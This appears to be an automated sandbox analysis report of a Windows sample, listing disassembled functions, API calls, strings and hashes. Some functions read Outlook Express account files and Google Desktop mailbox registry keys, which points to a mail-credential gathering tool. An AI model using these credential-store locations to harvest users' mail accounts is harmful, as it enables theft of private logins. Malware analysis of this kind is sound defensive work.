                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: Library$AddressFreeLoadProc
                  • String ID: SHAutoComplete$shlwapi.dll
                  • API String ID: 145871493-1506664499
                  • Opcode ID: 1745662a808ecc52a60ee12c912701a8b94b5af88e17989fb7bf14a85f6732ea
                  • Instruction ID: ed3b1cda8c3177e5f4c950405da88c53b72577223da9c459121c2a3053d1176f
                  • Opcode Fuzzy Hash: 1745662a808ecc52a60ee12c912701a8b94b5af88e17989fb7bf14a85f6732ea
                  • Instruction Fuzzy Hash: 5AD02B313002106BDA305F21BC09EEF3DEDEFC47937018032F800D2164DB258D0281AC
                  Function 00409808 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 57COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00405F07: strlen.MSVCRT ref: 00405F14
                    • Part of subcall function 00405F07: WriteFile.KERNEL32(00413B1C,00000001,00000000,76F90A60,00000000,?,?,00409460,00000001,00413B1C,76F90A60), ref: 00405F21
                  • memset.MSVCRT ref: 0040983E
                    • Part of subcall function 0040F70E: memcpy.MSVCRT ref: 0040F77C
                    • Part of subcall function 0040918B: strcpy.MSVCRT(00000000,?,00409874,?,?,?), ref: 00409190
                    • Part of subcall function 0040918B: _strlwr.MSVCRT ref: 004091D3
                  • sprintf.MSVCRT ref: 00409883
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileWrite_strlwrmemcpymemsetsprintfstrcpystrlen
                  • String ID: <%s>%s</%s>$</item>$<item>
                  • API String ID: 3200591283-2769808009
                  • Opcode ID: ef506932c8d52d72789fba1ffefffec390692f9936b3c03bbb8efc2406efdbf0
                  • Instruction ID: 22b2cf82475c3b06c8668363684e5b6771b4bc8edfe41877af386eb7fddec59d
                  • Opcode Fuzzy Hash: ef506932c8d52d72789fba1ffefffec390692f9936b3c03bbb8efc2406efdbf0
                  • Instruction Fuzzy Hash: 4B11A331600616BFDB11AF15CC42E967B64FF0831CF10017AF909666A2D77ABDA4DF98
                  Function 00411270 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00405ED5: CreateFileA.KERNEL32(0041133F,80000000,00000001,00000000,00000003,00000000,00000000,0041127B,0041141B,?,0041133F,?,?,*.oeaccount,0041141B,?), ref: 00405EE7
                  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0041133F,?,?,*.oeaccount,0041141B,?,00000104), ref: 0041128A
                  • ??2@YAPAXI@Z.MSVCRT ref: 0041129C
                  • SetFilePointer.KERNEL32(0041141B,00000002,00000000,00000000,?,?,0041133F,?,?,*.oeaccount,0041141B,?,00000104), ref: 004112AB
                    • Part of subcall function 00406725: ReadFile.KERNEL32(?,0041141B,?,00000000,00000000,?,?,004112BE,0041141B,00000000,-00000002,?,0041133F,?,?,*.oeaccount), ref: 0040673C
                    • Part of subcall function 00411133: wcslen.MSVCRT ref: 00411146
                    • Part of subcall function 00411133: ??2@YAPAXI@Z.MSVCRT ref: 0041114F
                    • Part of subcall function 00411133: WideCharToMultiByte.KERNEL32(00000000,00000000,004112D5,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004112D5,?,00000000,0041141B), ref: 00411168
                    • Part of subcall function 00411133: strlen.MSVCRT ref: 004111AB
                    • Part of subcall function 00411133: memcpy.MSVCRT ref: 004111C5
                    • Part of subcall function 00411133: ??3@YAXPAX@Z.MSVCRT ref: 00411258
                  • ??3@YAXPAX@Z.MSVCRT ref: 004112D6
                  • CloseHandle.KERNEL32(0041141B,?,0041133F,?,?,*.oeaccount,0041141B,?,00000104), ref: 004112E0
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                  • String ID:
                  • API String ID: 1886237854-0
                  • Opcode ID: a9cfe04fa5bdd51d8bf4059786eaa6f11c0805747c75d5ba186b56019847d930
                  • Instruction ID: e21230228d1277bb6eddc604f6d9b170c83676d8100b74bfcef0317b0316c018
                  • Opcode Fuzzy Hash: a9cfe04fa5bdd51d8bf4059786eaa6f11c0805747c75d5ba186b56019847d930
                  • Instruction Fuzzy Hash: BA01B532404248BEDB106F75EC4DDDBBFACEF59368710816BF958C62A0DA358D54CB68
                  Function 00407D63 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                  Download Yara Rule
                  APIs
                  • GetParent.USER32(?), ref: 00407D75
                  • GetWindowRect.USER32(?,?), ref: 00407D82
                  • GetClientRect.USER32(00000000,?), ref: 00407D8D
                  • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 00407D9D
                  • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00407DB9
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: Window$Rect$ClientParentPoints
                  • String ID:
                  • API String ID: 4247780290-0
                  • Opcode ID: 37609a960450173bf69824f7e52b241be5bc0a1fab6fa9040fc85c24cae36fff
                  • Instruction ID: 038819a919944698b8d7aadaf115a7119d50e81e4b6eee93b7f6b8021a4f8f43
                  • Opcode Fuzzy Hash: 37609a960450173bf69824f7e52b241be5bc0a1fab6fa9040fc85c24cae36fff
                  • Instruction Fuzzy Hash: F7015A32801129BBDB11AFA59C49EFFBFBCEF46751F04812AFD05A2140D738A605CBA5
                  Function 004099DA Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 44COMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 004099FD
                  • memset.MSVCRT ref: 00409A13
                    • Part of subcall function 00405F07: strlen.MSVCRT ref: 00405F14
                    • Part of subcall function 00405F07: WriteFile.KERNEL32(00413B1C,00000001,00000000,76F90A60,00000000,?,?,00409460,00000001,00413B1C,76F90A60), ref: 00405F21
                    • Part of subcall function 0040918B: strcpy.MSVCRT(00000000,?,00409874,?,?,?), ref: 00409190
                    • Part of subcall function 0040918B: _strlwr.MSVCRT ref: 004091D3
                  • sprintf.MSVCRT ref: 00409A4A
                  Strings
                  • <%s>, xrefs: 00409A44
                  • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00409A18
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: memset$FileWrite_strlwrsprintfstrcpystrlen
                  • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                  • API String ID: 3202206310-1998499579
                  • Opcode ID: 8832b5a78768cb6b45b9e86c8935bb2a9e75a3943d9c8cceaada708264de42f7
                  • Instruction ID: e71924cd66665c82b0e0cf5586ba0e292e849e53f6e9b6834f4978a1b65f22f6
                  • Opcode Fuzzy Hash: 8832b5a78768cb6b45b9e86c8935bb2a9e75a3943d9c8cceaada708264de42f7
                  • Instruction Fuzzy Hash: B601A7B2A001296AD720A655DC45FDB7A6C9F54704F0400FAB609F7182D7B8AA94CBA9
                  Function 004086DC Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: ??3@
                  • String ID:
                  • API String ID: 613200358-0
                  • Opcode ID: 918acd96936b96677d6dbe6e32eca864f76218b4922cdd818d5aaac1fd27dc8a
                  • Instruction ID: 072aa514f388f074079b8f328b082be18a1f899df3a3abdece790e68ac814aea
                  • Opcode Fuzzy Hash: 918acd96936b96677d6dbe6e32eca864f76218b4922cdd818d5aaac1fd27dc8a
                  • Instruction Fuzzy Hash: 97F0F4725057115FDB309FB99EC055BBBD5BB08714760093FF28AD3641CB79A890C618
                  Function 00408742 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 004086E8
                    • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 004086F6
                    • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 00408707
                    • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 0040871E
                    • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 00408727
                  • ??3@YAXPAX@Z.MSVCRT ref: 0040875D
                  • ??3@YAXPAX@Z.MSVCRT ref: 00408770
                  • ??3@YAXPAX@Z.MSVCRT ref: 00408783
                  • ??3@YAXPAX@Z.MSVCRT ref: 00408796
                  • free.MSVCRT(00000000), ref: 004087AA
                    • Part of subcall function 00406B8A: free.MSVCRT(00000000,00406F4C,00000000,?,?), ref: 00406B91
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: ??3@$free
                  • String ID:
                  • API String ID: 2241099983-0
                  • Opcode ID: 5868bb771c4ecc0bf5a1b6b5d500adaf89535c259bb090c2cea9b7557de00de1
                  • Instruction ID: 36c0512d224ac042a94a08cc7a852a1772878ff9935cd33c5980a4446e7632c9
                  • Opcode Fuzzy Hash: 5868bb771c4ecc0bf5a1b6b5d500adaf89535c259bb090c2cea9b7557de00de1
                  • Instruction Fuzzy Hash: 8CF0A4729025306F89313B325A01A4EB7A47D5472932A026FF90ABB3858F7D6C60C5DD
                  Function 0040EE8B Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 004062DB: memset.MSVCRT ref: 004062FB
                    • Part of subcall function 004062DB: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040630E
                    • Part of subcall function 004062DB: _stricmp.MSVCRT(00000000,edit), ref: 00406320
                  • SetBkMode.GDI32(?,00000001), ref: 0040EEB2
                  • GetSysColor.USER32(00000005), ref: 0040EEBA
                  • SetBkColor.GDI32(?,00000000), ref: 0040EEC4
                  • SetTextColor.GDI32(?,00C00000), ref: 0040EED2
                  • GetSysColorBrush.USER32(00000005), ref: 0040EEDA
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: Color$BrushClassModeNameText_stricmpmemset
                  • String ID:
                  • API String ID: 1869857563-0
                  • Opcode ID: fb94485f195de14578bb11bb35a76f110ea5450a675464f060a1de1235fa7123
                  • Instruction ID: 03c420b3e6d9e2244e0390b53f734bb3cf914c92d54749bbcb6c05866cd8fc50
                  • Opcode Fuzzy Hash: fb94485f195de14578bb11bb35a76f110ea5450a675464f060a1de1235fa7123
                  • Instruction Fuzzy Hash: 5BF08131140109BBDF116FA6EC09B9E3F69EF08712F10843AFA19641F1CB759A209B58
                  Function 00405CF8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123COMMON
                  Download Yara Rule
                  APIs
                  • BeginDeferWindowPos.USER32(0000000B), ref: 00405D11
                    • Part of subcall function 00401645: GetDlgItem.USER32(?,?), ref: 00401655
                    • Part of subcall function 00401645: GetClientRect.USER32(?,?), ref: 00401667
                    • Part of subcall function 00401645: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 004016D1
                  • EndDeferWindowPos.USER32(?), ref: 00405DE2
                  • InvalidateRect.USER32(?,?,00000001), ref: 00405DED
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                  • String ID: $
                  • API String ID: 2498372239-3993045852
                  • Opcode ID: a57de8c45b3456a0d8c08563bdb03b3f45c34c184d4faa9fce82ec50ca54258b
                  • Instruction ID: 9c87de9d9a27f98487306a7e65f23cb02f8420b0a21639e15617240473fc85a4
                  • Opcode Fuzzy Hash: a57de8c45b3456a0d8c08563bdb03b3f45c34c184d4faa9fce82ec50ca54258b
                  • Instruction Fuzzy Hash: CC314C30641254BBCB216F678C4DD8F7E7DEF86BA8F104479B406752A2D6758E00DAA8
                  Function 0040BAB7 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 74COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00401E4A: memset.MSVCRT ref: 00401E6C
                    • Part of subcall function 00401E4A: strlen.MSVCRT ref: 00401E85
                    • Part of subcall function 00401E4A: strlen.MSVCRT ref: 00401E93
                    • Part of subcall function 00401E4A: strlen.MSVCRT ref: 00401ED9
                    • Part of subcall function 00401E4A: strlen.MSVCRT ref: 00401EE7
                  • _stricmp.MSVCRT(/stext,0041344F,?,00000000,00000000,?,?,?,0040BCA6), ref: 0040BB0B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: strlen$_stricmpmemset
                  • String ID: /stext$O4A$O4A
                  • API String ID: 3575250601-3624624124
                  • Opcode ID: 7f0e710687395444cd0f3a313f6498683b374fdeb7e5e26100ad8a4f5dd32849
                  • Instruction ID: f8692cde8425b7317fc14f1eb66aa5838d4e8645dd66f9f31b24f8adae3a6e9d
                  • Opcode Fuzzy Hash: 7f0e710687395444cd0f3a313f6498683b374fdeb7e5e26100ad8a4f5dd32849
                  • Instruction Fuzzy Hash: 20213E707141119FC368AF29C8D1A66B3A8FB04318B15827FE41AA7692C779EC518BCD
                  Function 00407306 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61registryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0040F1B0: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040F559,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040F1C3
                  • memset.MSVCRT ref: 00407341
                    • Part of subcall function 0040F276: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040F299
                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 0040738F
                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004073AC
                  Strings
                  • Software\Google\Google Desktop\Mailboxes, xrefs: 00407319
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: Close$EnumOpenmemset
                  • String ID: Software\Google\Google Desktop\Mailboxes
                  • API String ID: 2255314230-2212045309
                  • Opcode ID: 9ab75551773aed32ac14d672ca6fc6d16b8ba2b7fe8e99e73c669c0c868d9bd0
                  • Instruction ID: e64120c2db1572d8afbfe90730df88552d052729858ffd3f9c459fe70d1883dc
                  • Opcode Fuzzy Hash: 9ab75551773aed32ac14d672ca6fc6d16b8ba2b7fe8e99e73c669c0c868d9bd0
                  • Instruction Fuzzy Hash: FE114F72808345BBD720EA52DC02EAB7BECEB84344F04493EBD94D1191E735DA1CDAA7
                  Function 0040AECD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43windowCOMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 0040AEED
                  • SetFocus.USER32(?,?), ref: 0040AF75
                    • Part of subcall function 0040AEB7: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040AEC6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: FocusMessagePostmemset
                  • String ID: @@A$l
                  • API String ID: 3436799508-3245464651
                  • Opcode ID: caeb76f4659ab955c907a99837df0e7903f88894a94faa412a12e2d9c7c3a8b3
                  • Instruction ID: b134d5c547a061a2024b59ce6a2071751047cb74c3ab3f5c012b8dbc43773ba7
                  • Opcode Fuzzy Hash: caeb76f4659ab955c907a99837df0e7903f88894a94faa412a12e2d9c7c3a8b3
                  • Instruction Fuzzy Hash: E511A5719001588BDF21DB15CD457CB7BA9AF40308F0800F5A94C7B282C7B55A89CFA5
                  Function 004085AB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41windowCOMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 004085C4
                  • SendMessageA.USER32(?,00001019,00000000,?), ref: 004085F2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: MessageSendmemset
                  • String ID: "$\LA
                  • API String ID: 568519121-1791104459
                  • Opcode ID: 26f90e38fa5412fa5d9144848af1d9542bec1eb57a3646f7dcddd4dc696a0724
                  • Instruction ID: 63acc278c780c6314b896fe9ea96fe6fcbd724764764ef8c6808a121558323c0
                  • Opcode Fuzzy Hash: 26f90e38fa5412fa5d9144848af1d9542bec1eb57a3646f7dcddd4dc696a0724
                  • Instruction Fuzzy Hash: 6401D635900204AFDB20DF45CA81AABB7F8FF84749F11842EE891A7241E7359E95CB79
                  Function 00406647 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35stringCOMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileNameOpenstrcpy
                  • String ID: <@A$L
                  • API String ID: 812585365-3325948237
                  • Opcode ID: 0e8797fdf618d39e3eb3ab1232a77db25cc5d7ab3626c4b171bcbec14203ab80
                  • Instruction ID: 37832acc40b05216fd1420d9404962ea4abb69311e967ef4bad7b399ffdc39fa
                  • Opcode Fuzzy Hash: 0e8797fdf618d39e3eb3ab1232a77db25cc5d7ab3626c4b171bcbec14203ab80
                  • Instruction Fuzzy Hash: 9001BDB1D102189FCF50DFA9D9456CEBFF8BB08348F00812AE519E6240EBB885458F98
                  Function 00401000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0040619B: memset.MSVCRT ref: 004061A5
                    • Part of subcall function 0040619B: strcpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,00406273,Arial,0000000E,00000000), ref: 004061E5
                  • CreateFontIndirectA.GDI32(?), ref: 0040101F
                  • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                  • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: ItemMessageSend$CreateFontIndirectmemsetstrcpy
                  • String ID: MS Sans Serif
                  • API String ID: 4251605573-168460110
                  • Opcode ID: 7584cd5e44123684fe29065303b056f6d65f03dbfdfa9ec3df9736e2aa6a92dd
                  • Instruction ID: 87dec32cde48cbcf1a13d2850fc5ac8412a7d38377e852ebd334ba5dd6d4256f
                  • Opcode Fuzzy Hash: 7584cd5e44123684fe29065303b056f6d65f03dbfdfa9ec3df9736e2aa6a92dd
                  • Instruction Fuzzy Hash: 0DF0A771B4030877EB216BA0EC4BF8A7BACAB41F01F148535FA51B51E1D6F5B644CB48
                  Function 004062DB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 004062FB
                  • GetClassNameA.USER32(?,00000000,000000FF), ref: 0040630E
                  • _stricmp.MSVCRT(00000000,edit), ref: 00406320
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: ClassName_stricmpmemset
                  • String ID: edit
                  • API String ID: 3665161774-2167791130
                  • Opcode ID: 6e637e9eddf622f627d70554f5007a36f01acadd3667ac6aea8fad4d2d9c4dd7
                  • Instruction ID: f5117061f2ecbf32e0f2d844d8c4f3ebb38ffa703039f8d1d2413de036cb48d9
                  • Opcode Fuzzy Hash: 6e637e9eddf622f627d70554f5007a36f01acadd3667ac6aea8fad4d2d9c4dd7
                  • Instruction Fuzzy Hash: 6BE09B72C4412A7EDB21A664EC01FE63BAC9F19705F0001B6B945E1081E6A497C48AA4
